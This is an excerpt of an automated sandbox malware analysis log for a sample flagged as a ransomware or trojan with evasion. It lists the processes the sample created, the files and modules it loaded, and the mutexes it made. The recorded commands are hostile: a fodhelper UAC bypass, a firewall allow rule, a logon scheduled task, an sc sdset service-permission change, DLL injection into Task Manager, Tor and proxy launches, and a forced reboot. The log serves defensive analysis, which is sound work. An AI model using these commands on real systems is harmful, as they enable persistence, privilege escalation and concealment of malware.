        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
        Source: C:\Windows\rss\csrss.exeSection loaded: edgegdi.dll
        Source: C:\Windows\rss\csrss.exeSection loaded: msvcr100.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
        Source: C:\Windows\rss\csrss.exeSection loaded: edgegdi.dll
        Source: C:\Windows\rss\csrss.exeSection loaded: msvcr100.dll
        Source: C:\Windows\System32\cmd.exeSection loaded: edgegdi.dll
        Source: C:\Windows\System32\fodhelper.exeSection loaded: edgegdi.dll
        Source: C:\Windows\rss\csrss.exeSection loaded: edgegdi.dll
        Source: C:\Windows\rss\csrss.exeSection loaded: msvcr100.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
        Source: C:\Windows\rss\csrss.exeSection loaded: edgegdi.dll
        Source: C:\Windows\rss\csrss.exeSection loaded: msvcr100.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
        Source: C:\Windows\rss\csrss.exeSection loaded: edgegdi.dll
        Source: C:\Windows\rss\csrss.exeSection loaded: msvcr100.dll
        Source: C:\Windows\System32\cmd.exeSection loaded: edgegdi.dll
        Source: C:\Windows\System32\fodhelper.exeSection loaded: edgegdi.dll
        Source: C:\Windows\rss\csrss.exeSection loaded: edgegdi.dll
        Source: C:\Windows\rss\csrss.exeSection loaded: msvcr100.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
        Source: C:\Windows\rss\csrss.exeSection loaded: edgegdi.dll
        Source: C:\Windows\rss\csrss.exeSection loaded: msvcr100.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
        Source: C:\Windows\rss\csrss.exeSection loaded: edgegdi.dll
        Source: C:\Windows\rss\csrss.exeSection loaded: msvcr100.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
        Source: C:\Windows\rss\csrss.exeSection loaded: edgegdi.dll
        Source: C:\Windows\rss\csrss.exeSection loaded: msvcr100.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
        Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: edgegdi.dll
        Source: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor.exeSection loaded: edgegdi.dll
        Source: C:\Windows\SysWOW64\sc.exeProcess token adjusted: Security
        Source: kdsyitkxmS.exeStatic PE information: invalid certificate
        Source: zlib1.dll.20.drStatic PE information: Number of sections : 11 > 10
        Source: libssp-0.dll.20.drStatic PE information: Number of sections : 18 > 10
        Source: libevent_core-2-1-7.dll.20.drStatic PE information: Number of sections : 18 > 10
        Source: libssl-1_1.dll.20.drStatic PE information: Number of sections : 19 > 10
        Source: libgcc_s_dw2-1.dll.20.drStatic PE information: Number of sections : 18 > 10
        Source: libcrypto-1_1.dll.20.drStatic PE information: Number of sections : 19 > 10
        Source: libevent_extra-2-1-7.dll.20.drStatic PE information: Number of sections : 18 > 10
        Source: libwinpthread-1.dll.20.drStatic PE information: Number of sections : 18 > 10
        Source: libevent-2-1-7.dll.20.drStatic PE information: Number of sections : 18 > 10
        Source: kdsyitkxmS.exeVirustotal: Detection: 31%
        Source: kdsyitkxmS.exeReversingLabs: Detection: 32%
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeFile read: C:\Users\user\Desktop\kdsyitkxmS.exeJump to behavior
        Source: kdsyitkxmS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
        Source: unknownProcess created: C:\Users\user\Desktop\kdsyitkxmS.exe C:\Users\user\Desktop\kdsyitkxmS.exe
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\servicing\TrustedInstaller.exe C:\Windows\servicing\TrustedInstaller.exe
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeProcess created: C:\Users\user\Desktop\kdsyitkxmS.exe C:\Users\user\Desktop\kdsyitkxmS.exe
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeProcess created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe fodhelper
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
        Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn ScheduledUpdate /f
        Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe fodhelper
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
        Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
        Source: C:\Windows\SysWOW64\mountvol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
        Source: C:\Windows\SysWOW64\mountvol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
        Source: C:\Windows\SysWOW64\mountvol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
        Source: C:\Windows\SysWOW64\mountvol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
        Source: C:\Windows\SysWOW64\shutdown.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor.exe C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor.exe" --nt-service -f "C:\Users\user\AppData\Local\Temp\csrss\tor\torrc" --Log "notice file C:\Users\user\AppData\Local\Temp\csrss\tor\log.txt
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exe C:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exe -bind-address 127.0.0.1:31466
        Source: C:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeProcess created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exe C:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exe -bind-address 127.0.0.1:31466
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe fodhelper
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
        Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe fodhelper
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
        Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\InProcServer32
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xnlrizwa.4cp.ps1Jump to behavior
        Source: classification engineClassification label: mal100.rans.troj.evad.winEXE@111/94@10/15
        Source: C:\Windows\System32\cmd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\01f6936167b38afa142d4ec8a8e5fb01\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\01f6936167b38afa142d4ec8a8e5fb01\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\01f6936167b38afa142d4ec8a8e5fb01\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\01f6936167b38afa142d4ec8a8e5fb01\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\01f6936167b38afa142d4ec8a8e5fb01\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\01f6936167b38afa142d4ec8a8e5fb01\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\01f6936167b38afa142d4ec8a8e5fb01\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\01f6936167b38afa142d4ec8a8e5fb01\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\01f6936167b38afa142d4ec8a8e5fb01\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\01f6936167b38afa142d4ec8a8e5fb01\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\01f6936167b38afa142d4ec8a8e5fb01\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\01f6936167b38afa142d4ec8a8e5fb01\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\01f6936167b38afa142d4ec8a8e5fb01\mscorlib.ni.dll
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5316:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:680:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8556:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6720:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:680:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8896:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8644:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6536:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5480:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9116:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9208:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1448:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8556:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4808:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2900:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8644:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5868:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6864:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5316:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6536:304:WilStaging_02
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeMutant created: \Sessions\1\BaseNamedObjects\Global\qtxp9g8w
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4164:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7124:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3308:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7124:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8312:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9208:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8296:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3308:304:WilStaging_02
